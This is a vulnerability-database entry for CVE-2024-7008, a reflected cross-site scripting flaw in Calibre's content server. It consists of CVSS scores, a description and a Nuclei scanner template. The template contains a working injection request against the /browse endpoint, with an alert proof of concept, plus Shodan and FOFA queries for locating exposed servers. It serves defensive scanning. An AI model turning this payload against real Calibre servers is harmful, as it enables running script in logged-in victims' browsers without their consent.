Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-7008HistoryJul 31, 2024 - 4:32 p.m.
Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)
2024-07-3116:32:06
ProjectDiscovery
github.com
18
calibre server
cross-site scripting
crafted url
victim's browser
authentication
attacker
javascript code
CVSS3
5.4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
AI Score
7.2
Confidence
High
EPSS
0.001
Percentile
31.2%
It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attacker’s JavaScript code in the context of the victim’s browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
id: CVE-2024-7008
info:
name: Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)
author: DhiyaneshDK
severity: medium
description: |
It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attacker’s JavaScript code in the context of the victim’s browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
reference:
- https://starlabs.sg/advisories/24/24-7008/
metadata:
verified: true
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-requeset: 1
tags: cve,cve2024,calibre,xss
http:
- raw:
- |
GET /browse/book/TEST";window.stop();alert(document.domain);%2f%2f HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- 'window.location.href = "/#book_id=TEST";window.stop();alert(document.domain);//&panel=book_details'
- type: status
status:
- 200
# digest: 490a004630440220204753a269829273bf653d6bc90e49f892dbce2ee36a361edb1e33a0537442da02203a4a9991048fd3702d95471a875fb381c0fa628e090a0f4156c8f876dae1be48:922c64590222798bb761d5b6d8e72950References
Related
vulnrichment
vulnrichment
CVE-2024-7008 Calibre Reflected Cross-Site Scripting (XSS)
2024-08-06 03:40:01
cvelist
cvelist
CVE-2024-7008 Calibre Reflected Cross-Site Scripting (XSS)
2024-08-06 03:40:01
nvd
nvd
CVE-2024-7008
2024-08-06 04:16:46
debiancve
debiancve
CVE-2024-7008
2024-08-06 04:16:46
osv
osv
CVE-2024-7008
2024-08-06 04:16:46
cve
cve
CVE-2024-7008
2024-08-06 04:16:46
ubuntucve
ubuntucve
CVE-2024-7008
2024-08-06 00:00:00
fedora
fedora
[SECURITY] Fedora 40 Update: calibre-7.17.0-3.fc40
2024-08-27 17:09:06
openvas
openvas
Fedora: Security Advisory (FEDORA-2024-a455bea9ca)
2024-09-10 00:00:00
nessus
nessus
Fedora 40 : calibre (2024-a455bea9ca)
2024-08-27 00:00:00
CVSS3
5.4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
AI Score
7.2
Confidence
High
EPSS
0.001
Percentile
31.2%
Related for NUCLEI:CVE-2024-7008